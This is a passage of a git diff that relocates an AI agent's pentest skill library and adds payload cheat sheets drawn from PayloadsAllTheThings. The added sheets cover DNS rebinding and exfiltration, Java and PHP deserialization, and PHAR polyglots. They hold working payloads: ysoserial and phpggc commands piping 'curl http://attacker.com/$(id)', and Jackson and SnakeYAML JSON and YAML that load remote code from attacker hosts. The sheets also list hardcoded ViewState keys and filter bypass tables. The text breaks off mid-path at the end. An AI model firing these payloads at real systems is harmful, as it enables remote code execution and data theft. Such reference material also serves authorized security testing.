a/projects/pentest/.claude/skills/pentest/attacks/injection/xxe/xxe-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/injection/xxe/xxe-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/injection/xxe/xxe-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/injection/xxe/xxe-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/injection/xxe/xxe-quickstart.md b/plugins/pentest/skills/pentest/attacks/injection/xxe/xxe-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/injection/xxe/xxe-quickstart.md rename to plugins/pentest/skills/pentest/attacks/injection/xxe/xxe-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/README.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/README.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/README.md rename to plugins/pentest/skills/pentest/attacks/ip-infrastructure/README.md diff --git a/plugins/pentest/skills/pentest/attacks/ip-infrastructure/dns/payloads/techniques.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/dns/payloads/techniques.md new file mode 100644 index 0000000..c0f9546 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/dns/payloads/techniques.md @@ -0,0 +1,126 @@ +--- +source: PayloadsAllTheThings +patt-path: DNS Rebinding/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/DNS%20Rebinding/README.md +last-curated: 2026-03-14 +priority: medium +--- + +# DNS — Attack Techniques Payloads + +## Quick Hits + +### Zone Transfer (AXFR) +```bash +dig axfr @DNS_SERVER TARGET.COM +dnsrecon -d TARGET.COM -t axfr +``` + +### DNS Enumeration +```bash +# Brute-force subdomains +gobuster dns -d TARGET.COM -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt +amass enum -active -d TARGET.COM +subfinder -d TARGET.COM -o subdomains.txt + +# Check NS / MX / TXT records +dig NS TARGET.COM +dig MX TARGET.COM +dig TXT TARGET.COM # SPF, DKIM, DMARC, internal hints + +# Reverse DNS +dig -x IP_ADDRESS +``` + +### DNS Rebinding Attack Setup +```bash +# 1. Register domain (e.g. evil.com) +# 2. Set NS record to attacker-controlled nameserver +# 3. Serve very low TTL (0-5 seconds) initially → victim IP +# 4. After browser caches response → rebind to 127.0.0.1 or internal IP +# 5. Browser re-uses same-origin cookie; victim app treats request as localhost + +# Singularity of Origin (automated DNS rebinding toolkit) +git clone https://github.com/nccgroup/singularity +cd singularity +go build -o singularity cmd/singularity-server/main.go +./singularity -DNSrebindStrategy 1 -lport 8080 -rport VICTIM_PORT +# Payload URL: http://s-ATTACKER_IP-VICTIM_IP-VICTIM_PORT-fs.evil.com/ +``` + +## Extended List + +### Subdomain Takeover +```bash +# Discover dangling CNAMEs +subjack -w subdomains.txt -t 100 -o takeover_results.txt -ssl +dnstwist --registered TARGET.COM # typosquatting + +# Common takeover-vulnerable services (CNAME points to unclaimed resource) +# sub.target.com CNAME foo.s3-website-us-east-1.amazonaws.com → claim bucket +# sub.target.com CNAME foo.github.io → claim GitHub Pages repo +# sub.target.com CNAME foo.azurewebsites.net → claim Azure Web App +# sub.target.com CNAME foo.herokuapp.com → claim Heroku app +``` + +### DNS-Based SSRF Bypass +``` +# Use DNS with time-based rebinding to bypass IP allow-lists +# Serve legitimate IP during check → rebind to internal IP for payload + +# DNS SSRF filter bypass via URL encoding +http://attacker%2ecom@169.254.169.254/ +http://169%2e254%2e169%2e254/ + +# DNS pinning bypass (DNS rebinding in cloud metadata) +# Register: victim.attacker.com → 169.254.169.254 (low TTL) +# SSRF hits: http://victim.attacker.com/latest/meta-data/ +``` + +### Blind DNS Exfiltration (Out-of-Band) +```bash +# Inject payload that triggers DNS lookup to attacker-controlled domain +# Burp Collaborator: burp-collab.net +# interactsh: https://github.com/projectdiscovery/interactsh + +# Test blind XXE / SSRF via DNS +# Payload: http://$(whoami).attacker.com/ +# Or base64: http://`id | base64`.attacker.com/ + +# Interactsh client +interactsh-client -server oast.pro -v +``` + +### DNS Record Injection / Abuse +```bash +# SPF bypass for email spoofing +# Check: dig TXT TARGET.COM | grep spf +# Weak SPF: v=spf1 include:third-party.com ~all → target third-party service + +# DMARC check +dig TXT _dmarc.TARGET.COM +# p=none = no enforcement → spoofing possible + +# Internal hostname enumeration via certificate transparency +curl "https://crt.sh/?q=%.TARGET.COM&output=json" | jq '.[].name_value' | sort -u +``` + +## Bypass Variants + +| Restriction | Technique | +|-------------|-----------| +| IP-based SSRF filter | DNS rebinding: domain resolves to allowed IP then rebinds to internal | +| DNS resolution blocked outbound | Use DNS tunneling (port 53 UDP often allowed) | +| DNSSEC enabled | Zone transfers may still work on delegated zones | +| Wildcard DNS `*.target.com → park page` | Identify non-wildcard subdomains via brute-force mismatches | + +## Notes + +- **Tools**: dig, dnsrecon, amass, subfinder, gobuster, subjack, singularity, iodine, dnscat2, interactsh +- DNS rebinding bypasses SOP — browser sees attacker domain resolving to `127.0.0.1` after TTL flush +- Subdomain takeover: always check unclaimed CNAME targets in cloud providers +- crt.sh is passive subdomain discovery — no target traffic generated +- DNS exfil needs attacker-controlled authoritative nameserver (not just a domain) + +--- +*Full list: `patt-fetcher` agent → "DNS rebinding attacks"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/dns/quickstart.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/dns/quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/dns/quickstart.md rename to plugins/pentest/skills/pentest/attacks/ip-infrastructure/dns/quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/dos/quickstart.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/dos/quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/dos/quickstart.md rename to plugins/pentest/skills/pentest/attacks/ip-infrastructure/dos/quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/ipv6/quickstart.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/ipv6/quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/ipv6/quickstart.md rename to plugins/pentest/skills/pentest/attacks/ip-infrastructure/ipv6/quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/mitm/quickstart.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/mitm/quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/mitm/quickstart.md rename to plugins/pentest/skills/pentest/attacks/ip-infrastructure/mitm/quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/port-scanning/quickstart.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/port-scanning/quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/port-scanning/quickstart.md rename to plugins/pentest/skills/pentest/attacks/ip-infrastructure/port-scanning/quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/reference/README.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/reference/README.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/reference/README.md rename to plugins/pentest/skills/pentest/attacks/ip-infrastructure/reference/README.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/reference/firewall-detection.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/reference/firewall-detection.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/reference/firewall-detection.md rename to plugins/pentest/skills/pentest/attacks/ip-infrastructure/reference/firewall-detection.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/reference/icmp-scan.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/reference/icmp-scan.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/reference/icmp-scan.md rename to plugins/pentest/skills/pentest/attacks/ip-infrastructure/reference/icmp-scan.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/reference/ip-reputation.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/reference/ip-reputation.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/reference/ip-reputation.md rename to plugins/pentest/skills/pentest/attacks/ip-infrastructure/reference/ip-reputation.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/reference/os-fingerprint.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/reference/os-fingerprint.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/reference/os-fingerprint.md rename to plugins/pentest/skills/pentest/attacks/ip-infrastructure/reference/os-fingerprint.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/reference/service-enum.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/reference/service-enum.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/reference/service-enum.md rename to plugins/pentest/skills/pentest/attacks/ip-infrastructure/reference/service-enum.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/reference/syn-scan.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/reference/syn-scan.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/reference/syn-scan.md rename to plugins/pentest/skills/pentest/attacks/ip-infrastructure/reference/syn-scan.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/reference/udp-scan.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/reference/udp-scan.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/reference/udp-scan.md rename to plugins/pentest/skills/pentest/attacks/ip-infrastructure/reference/udp-scan.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/smb-netbios/quickstart.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/smb-netbios/quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/smb-netbios/quickstart.md rename to plugins/pentest/skills/pentest/attacks/ip-infrastructure/smb-netbios/quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/sniffing/quickstart.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/sniffing/quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/sniffing/quickstart.md rename to plugins/pentest/skills/pentest/attacks/ip-infrastructure/sniffing/quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/vlan-hopping/quickstart.md b/plugins/pentest/skills/pentest/attacks/ip-infrastructure/vlan-hopping/quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/ip-infrastructure/vlan-hopping/quickstart.md rename to plugins/pentest/skills/pentest/attacks/ip-infrastructure/vlan-hopping/quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/physical-social/social-engineering/social-engineering.md b/plugins/pentest/skills/pentest/attacks/physical-social/social-engineering/social-engineering.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/physical-social/social-engineering/social-engineering.md rename to plugins/pentest/skills/pentest/attacks/physical-social/social-engineering/social-engineering.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-cheat-sheet.md similarity index 89% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-cheat-sheet.md index 1834fd9..4500a63 100644 --- a/projects/pentest/.claude/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-cheat-sheet.md +++ b/plugins/pentest/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-cheat-sheet.md @@ -152,6 +152,35 @@ O:5:"Start":1:{ } ``` +<!-- PATT enrichment 2026-03-14 --> +### PHAR Deserialization (file function trigger) + +Any PHP file function with a `phar://` wrapper deserializes the PHAR manifest: +```php +file_exists('phar://upload/evil.jpg'); +file_get_contents('phar://upload/evil.jpg'); +// Also: is_file, file, fopen, stat, etc. +``` + +**PHAR creation with JPEG magic byte bypass:** +```php +$phar = new Phar('evil.phar'); +$phar->startBuffering(); +$phar->addFromString('x.txt','x'); +$phar->setStub("\xff\xd8\xff<?php __HALT_COMPILER(); ?>"); // JPEG header +$phar->setMetadata(new VulnerableClass()); +$phar->stopBuffering(); +rename('evil.phar','evil.jpg'); // passes getimagesize() check +``` + +### Reference-based collision (R: notation) +``` +O:13:"ObjectExample":2:{s:10:"secretCode";N;s:5:"guess";R:2;} +# R:2 makes "guess" point to same memory as "secretCode" → always equal +``` + +<!-- end PATT enrichment 2026-03-14 --> + ### PHP Dangerous Functions ```php @@ -336,6 +365,65 @@ SerializableTypeWrapper.MethodInvokeTypeProvider.readObject() | ROME | 1.0 | ROME | | Vaadin | 7.7.x | Vaadin1 | +<!-- PATT enrichment 2026-03-14 --> +### Jackson JSON Deserialization CVEs + +**CVE-2017-7525** (Jackson + TemplatesImpl): +```json +{"param":["com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", + {"transletBytecodes":["yv66v[B64_CLASS]AIAEw=="], + "transletName":"a.b","outputProperties":{}}]} +``` + +**CVE-2017-17485** (Spring FileSystemXmlApplicationContext): +```json +{"param":["org.springframework.context.support.FileSystemXmlApplicationContext", + "http://attacker/spel.xml"]} +``` + +**CVE-2019-12384** (Logback JDBC → INIT script RCE): +```json +["ch.qos.logback.core.db.DriverManagerConnectionSource", + {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://attacker:8000/inject.sql'"}] +``` + +**CVE-2020-36180** (Apache DBCP2): +```json +["org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS", + {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://attacker:3333/exec.sql'"}] +``` + +**Detection:** Send invalid JSON → look for error referencing `com.fasterxml.jackson.databind` or `org.codehaus.jackson.map`. + +### SnakeYAML RCE +```yaml +!!javax.script.ScriptEngineManager [ + !!java.net.URLClassLoader [[ + !!java.net.URL ["http://attacker-ip/"] + ]] +] +``` +Affected: SnakeYAML, jYAML, YamlBeans. + +### JSF ViewState — Hardcoded Secrets + +| Algorithm | Secret (Base64) | +|---|---| +| DES | `NzY1NDMyMTA=` | +| DESede | `MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz` | +| AES CBC | `MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz` | +| AES CBC/PKCS5Padding | `NzY1NDMyMTA3NjU0MzIxMA==` | +| Blowfish | `NzY1NDMyMTA3NjU0MzIxMA` | + +**ViewState decode:** +```bash +echo "VALUE" | base64 -d # server-side (rO0 prefix) +echo "VALUE" | base64 -d | zcat # client-side (H4sIAAA prefix) +``` +**Tools:** `jexboss`, `InYourFace` (JSF ViewState patcher). + +<!-- end PATT enrichment 2026-03-14 --> + ### Custom Java Exploitation **Basic RCE object:** diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-index.md b/plugins/pentest/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-index.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-index.md rename to plugins/pentest/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-index.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-quickstart.md b/plugins/pentest/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-quickstart.md rename to plugins/pentest/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-resources.md b/plugins/pentest/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-resources.md rename to plugins/pentest/skills/pentest/attacks/server-side/deserialization/insecure-deserialization-resources.md diff --git a/plugins/pentest/skills/pentest/attacks/server-side/deserialization/payloads/java.md b/plugins/pentest/skills/pentest/attacks/server-side/deserialization/payloads/java.md new file mode 100644 index 0000000..c2c6de4 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/server-side/deserialization/payloads/java.md @@ -0,0 +1,123 @@ +--- +source: PayloadsAllTheThings +patt-path: Insecure Deserialization/Java.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Insecure%20Deserialization/Java.md +last-curated: 2026-03-14 +priority: high +--- + +# Deserialization — Java Payloads + +## Quick Hits + +### Detection signatures +| Format | Hex | Base64 | +|---|---|---| +| Java serialized | `AC ED 00 05` | `rO0` | +| Gzip+B64 serialized | — | `H4sIAAAAAAAAAJ` | +| JSF ViewState (gzip) | — | `H4sIAAA` | +| Content-Type header | `application/x-java-serialized-object` | — | + +### ysoserial — common gadget chains +```bash +# RCE via CommonsCollections1 +java -jar ysoserial.jar CommonsCollections1 'whoami' > payload.bin + +# Ping test (OOB detection) +java -jar ysoserial.jar URLDNS 'http://burp-collaborator-id.burpcollaborator.net' > payload.bin + +# Groovy RCE +java -jar ysoserial.jar Groovy1 'ping -c 1 attacker.com' > payload.bin + +# Gzip+Base64 encode for HTTP +java -jar ysoserial.jar CommonsCollections6 'curl http://attacker.com/$(id)' | gzip | base64 -w0 +``` + +### Key gadget chains to try (in order) +``` +CommonsCollections1, CommonsCollections3, CommonsCollections6 +Spring1, Spring2 +Jdk7u21 +Groovy1 +ROME +AspectJWeaver +``` + +## Extended List + +### Jackson JSON deserialization RCE + +**CVE-2017-7525** (Jackson + XalanInterpreter): +```json +{"param":["com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", + {"transletBytecodes":["yv66v[JAVA_CLASS_B64]AIAEw=="], + "transletName":"a.b","outputProperties":{}}]} +``` + +**CVE-2017-17485** (Spring FileSystemXmlApplicationContext): +```json +{"param":["org.springframework.context.support.FileSystemXmlApplicationContext", + "http://attacker/spel.xml"]} +``` + +**CVE-2019-12384** (Logback JDBC → INIT script): +```json +["ch.qos.logback.core.db.DriverManagerConnectionSource", + {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://attacker:8000/inject.sql'"}] +``` + +**CVE-2020-36180** (Apache DBCP2): +```json +["org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS", + {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://attacker:3333/exec.sql'"}] +``` + +### SnakeYAML RCE +```yaml +!!javax.script.ScriptEngineManager [ + !!java.net.URLClassLoader [[ + !!java.net.URL ["http://attacker-ip/"] + ]] +] +``` + +### JSF ViewState exploitation +```bash +# Decode server-side ViewState +echo "VALUE" | base64 -d # if B64 only (prefix rO0) +echo "VALUE" | base64 -d | zcat # if gzip+B64 (prefix H4sIAAA) + +# Common hardcoded DES secret +# NzY1NDMyMTA= (DES ECB + HMAC-SHA1) +# Use jexboss or InYourFace to patch ViewState +``` + +### Burp extensions +- JavaSerialKiller, Java Deserialization Scanner, burp-ysoserial, SuperSerial-Active + +### Other tools +```bash +marshalsec # SnakeYAML, XStream, Hessian, Jackson +gadgetprobe # enumerate available gadget chains remotely +SerializationDumper # human-readable deserialization analysis +``` + +## Bypass Variants + +| Defense | Bypass | +|---|---| +| Blacklist of class names | Use alternative gadget chain (CC6 vs CC1) | +| Signature/HMAC on payload | Known hardcoded secrets; brute force short keys | +| Content-Type filtering | Embed in JSON/XML wrapper instead of raw binary | +| Classpath restrictions | Enumerate with gadgetprobe first | + +## Notes + +- Always start with URLDNS gadget (no classpath deps) for OOB detection +- CommonsCollections6 works without reflection restrictions (post-Java 9) +- JBoss, WebLogic, WebSphere are historically high-value targets +- If ysoserial fails, try SerialBrute to iterate chains automatically +- Verify with Burp Collaborator before attempting command execution + +--- +*Full list: `patt-fetcher` agent → "Deserialization"* diff --git a/plugins/pentest/skills/pentest/attacks/server-side/deserialization/payloads/php.md b/plugins/pentest/skills/pentest/attacks/server-side/deserialization/payloads/php.md new file mode 100644 index 0000000..d08c922 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/server-side/deserialization/payloads/php.md @@ -0,0 +1,118 @@ +--- +source: PayloadsAllTheThings +patt-path: Insecure Deserialization/PHP.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Insecure%20Deserialization/PHP.md +last-curated: 2026-03-14 +priority: high +--- + +# Deserialization — PHP Payloads + +## Quick Hits + +### Detection signature +| Format | Hex | Prefix | +|---|---|---| +| PHP serialized | `4F 3A` | `O:` (object) or `a:` (array) or `s:` (string) | +| PHP serialized B64 | — | `Tz` | + +### Type juggling auth bypass via serialized bool +``` +a:2:{s:8:"username";b:1;s:8:"password";b:1;} +# b:1 = boolean true; loose == comparison passes "true" == "any_string" +``` + +### phpggc — gadget chain generator +```bash +# List available chains +phpggc -l + +# Generate RCE payload for Laravel +phpggc Laravel/RCE1 system whoami + +# Generate for Symfony +phpggc Symfony/RCE4 exec 'curl http://attacker.com/$(id)' + +# Base64 encode output +phpggc Monolog/RCE1 'phpinfo();' -s | base64 +``` + +### Magic methods targeted +| Method | Triggered when | +|---|---| +| `__wakeup()` | Object is unserialized | +| `__destruct()` | Object is garbage collected | +| `__toString()` | Object used as string | +| `__call()` | Undefined method called | + +## Extended List + +### Common POP gadget frameworks +| Framework | phpggc chains | +|---|---| +| Laravel | RCE1–RCE9, FD1 | +| Symfony | RCE1–RCE7, FD1 | +| Monolog | RCE1–RCE2, RCE6 | +| SwiftMailer | FR1, echo1 | +| SlimPHP | RCE1 | +| Guzzle | FW1, INFO1 | + +### Reference-based collision +``` +O:13:"ObjectExample":2:{s:10:"secretCode";N;s:5:"guess";R:2;} +# R:2 makes "guess" reference "secretCode" — same pointer, always equal +``` + +### PHAR deserialization (trigger via file functions) +```php +// Create malicious PHAR +<?php +$phar = new Phar('evil.phar'); +$phar->startBuffering(); +$phar->addFromString('x.txt', 'x'); +$phar->setStub('<?php __HALT_COMPILER(); ?>'); +$o = new VulnerableClass(); +$phar->setMetadata($o); +$phar->stopBuffering(); +// Rename to evil.jpg to bypass extension check +``` + +**Trigger**: +```php +file_exists('phar://upload/evil.jpg'); +file_get_contents('phar://upload/evil.jpg'); +// Any file function with phar:// wrapper deserializes metadata +``` + +### JPEG magic bytes PHAR bypass +```php +// Prepend JPEG header to PHAR to bypass getimagesize() check +// Add \xff\xd8\xff as first bytes before PHAR stub +``` + +### Blind deserialization check (OOB) +``` +O:8:"Anything":1:{s:3:"url";s:30:"http://burp-collaborator.net/";} +# If __wakeup or __destruct makes HTTP call, confirms deserialization +``` + +## Bypass Variants + +| Defense | Bypass | +|---|---| +| `unserialize()` class whitelist | Find gadget within allowed classes | +| Magic method blocking | Chain via intermediate trusted classes | +| Extension filtering on upload | PHAR with JPEG magic bytes | +| WAF blocking `O:` | Base64 encode: `Tz...` | +| `serialize_precision` changes | Test both PHP 7 and PHP 8 format | + +## Notes + +- Entry point: always grep for `unserialize($_` in source +- Look for `__wakeup`, `__destruct`, `__toString` in included classes +- phpggc covers most modern frameworks; check `-l` for full list +- PHAR deserialization: any file function + `phar://` + user-controlled path +- PHP 8 fixes loose string comparisons → verify target PHP version first + +--- +*Full list: `patt-fetcher` agent → "Deserialization"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/file-upload/file-upload-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/server-side/file-upload/file-upload-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/file-upload/file-upload-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/server-side/file-upload/file-upload-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/file-upload/file-upload-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/server-side/file-upload/file-upload-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/file-upload/file-upload-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/server-side/file-upload/file-upload-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/file-upload/file-upload-quickstart.md b/plugins/pentest/skills/pentest/attacks/server-side/file-upload/file-upload-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/file-upload/file-upload-quickstart.md rename to plugins/pentest/skills/pentest/attacks/server-side/file-upload/file-upload-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/file-upload/file-upload-resources.md b/plugins/pentest/skills/pentest/attacks/server-side/file-upload/file-upload-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/file-upload/file-upload-resources.md rename to plugins/pentest/skills/pentest/attacks/server-side/file-upload/file-upload-resources.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/host-header/http-host-header-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/server-side/host-header/http-host-header-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/host-header/http-host-header-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/server-side/host-header/http-host-header-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/host-header/http-host-header-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/server-side/host-header/http-host-header-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/host-header/http-host-header-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/server-side/host-header/http-host-header-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/host-header/http-host-header-quickstart.md b/plugins/pentest/skills/pentest/attacks/server-side/host-header/http-host-header-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/host-header/http-host-header-quickstart.md rename to plugins/pentest/skills/pentest/attacks/server-side/host-header/http-host-header-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/host-header/http-host-header-resources.md b/plugins/pentest/skills/pentest/attacks/server-side/host-header/http-host-header-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/host-header/http-host-header-resources.md rename to plugins/pentest/skills/pentest/attacks/server-side/host-header/http-host-header-resources.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/http-smuggling/http-request-smuggling-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/server-side/http-smuggling/http-request-smuggling-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/http-smuggling/http-request-smuggling-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/server-side/http-smuggling/http-request-smuggling-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/http-smuggling/http-request-smuggling-quickstart.md b/plugins/pentest/skills/pentest/attacks/server-side/http-smuggling/http-request-smuggling-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/http-smuggling/http-request-smuggling-quickstart.md rename to plugins/pentest/skills/pentest/attacks/server-side/http-smuggling/http-request-smuggling-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/http-smuggling/http-request-smuggling-resources.md b/plugins/pentest/skills/pentest/attacks/server-side/http-smuggling/http-request-smuggling-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/http-smuggling/http-request-smuggling-resources.md rename to plugins/pentest/skills/pentest/attacks/server-side/http-smuggling/http-request-smuggling-resources.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/http-smuggling/http-request-smuggling.md b/plugins/pentest/skills/pentest/attacks/server-side/http-smuggling/http-request-smuggling.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/http-smuggling/http-request-smuggling.md rename to plugins/pentest/skills/pentest/attacks/server-side/http-smuggling/http-request-smuggling.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/path-traversal/path-traversal-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/server-side/path-traversal/path-traversal-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/path-traversal/path-traversal-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/server-side/path-traversal/path-traversal-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/path-traversal/path-traversal-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/server-side/path-traversal/path-traversal-portswigger-labs-complete.md similarity index 100% rename from 